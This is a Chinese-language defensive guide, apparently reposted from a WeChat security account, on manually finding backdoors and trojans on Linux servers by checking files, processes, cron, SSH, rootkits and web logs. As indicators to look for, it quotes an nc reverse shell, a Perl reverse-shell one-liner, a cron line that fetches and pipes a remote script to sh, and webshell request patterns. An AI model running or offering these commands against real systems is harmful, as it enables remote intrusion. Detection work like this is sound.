手工排查后门木马的常用姿势

admin 2025年4月1日14:49:46评论14 views字数 1817阅读6分3秒阅读模式

声明!本文章所有的工具分享仅仅只是供大家学习交流为主,切勿用于非法用途,如有任何触犯法律的行为,均与本人及团队无关!!!

1. 检查异常文件

(1)查找最近修改的文件

# 查找最近3天内被修改的文件(重点检查Web目录)
find /var/www/ -type f -mtime -3 -ls | sort -k8

● 重点关注:.php、.jsp、.asp、.sh 等可执行文件。
● 隐藏文件:检查 /tmp/、/dev/shm/ 等临时目录。

(2)查找可疑文件名

# 查找包含常见后门特征的文件名
find / -name "*shell*" -o -name "*backdoor*" -o -name "*b374k*" -o -name "*c99*" -ls

● 常见WebShell:shell.php、b374k.php、c99.php、wso.php。
● 隐藏技巧:攻击者可能使用 ..gif.php 伪装成图片。

(3)查找大文件(可能含加密数据)

find / -type f -size +5M -exec ls -lh {} ; | grep -v "log|cache"

● 异常大文件:可能是攻击者存放的加密数据或恶意代码。

2. 检查异常进程

(1)查看运行中的可疑进程

ps aux | grep -E "(sh|bash|perl|python|nc|ncat|socat|wget|curl|./)"

● 常见后门进程:
● nc -lvp 4444 -e /bin/bash(反弹Shell)
● perl -e 'use Socket;p=4444;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));connect(S,sockaddr_in(i)));open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");

(2)检查隐藏进程

# 查看所有进程(包括无二进制文件的进程)
top -c

● 异常进程:无对应文件、占用高CPU、奇怪命令行参数。

(3)检查网络连接

netstat -antp | grep ESTABLISHED
ss -tulnp

● 可疑外联IP:连接到未知IP的 bash、sh、nc 进程。

3. 检查定时任务

(1)查看用户级定时任务

crontab -l

(2)检查系统级定时任务

ls -la /etc/cron.*
cat /etc/crontab

● 异常任务:如 wget http://x.x.x.x/malware.sh | sh。

4. 检查SSH后门

(1)查看SSH登录记录

cat /var/log/auth.log | grep "Accepted"
cat /var/log/secure | grep "Accepted"# CentOS

● 异常登录:陌生IP、非工作时间登录。

(2)检查SSH密钥

ls -la ~/.ssh/authorized_keys

● 攻击者可能添加自己的公钥,实现免密登录。

(3)检查SSH配置文件

cat /etc/ssh/sshd_config | grep -E "(PermitRootLogin|AllowUsers|Port)"

● 异常配置:PermitRootLogin yes(应禁用root登录)

5. 检查内核级Rootkit

(1)检查系统调用劫持

strace -p <PID>  # 跟踪进程的系统调用

● 异常行为:如 open("/etc/shadow") 或 execve("/bin/sh")。

(2)使用专用工具检测

# 安装并运行Rootkit检测工具
sudo apt install rkhunter chkrootkit -y
sudo rkhunter --check
sudo chkrootkit

6. 检查Web日志

(1)查找可疑HTTP请求

cat /var/log/apache2/access.log | grep -E "(cmd=|eval|system|passthru|shell_exec)"

● 常见攻击特征: ○ GET /index.php?cmd=whoami ○ POST /upload.php -F "[email protected]"

(2)检查大流量IP

cat /var/log/nginx/access.log | awk '{print $1}' | sort | uniq -c | sort -nr | head -n 10

● 高频访问IP:可能是攻击者在扫描或爆破。

7.总结

手工排查后门木马的常用姿势

原文始发于微信公众号(泷羽SEC-ohh):手工排查后门木马的常用姿势

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2025年4月1日14:49:46
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   手工排查后门木马的常用姿势https://cn-sec.com/archives/3904202.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息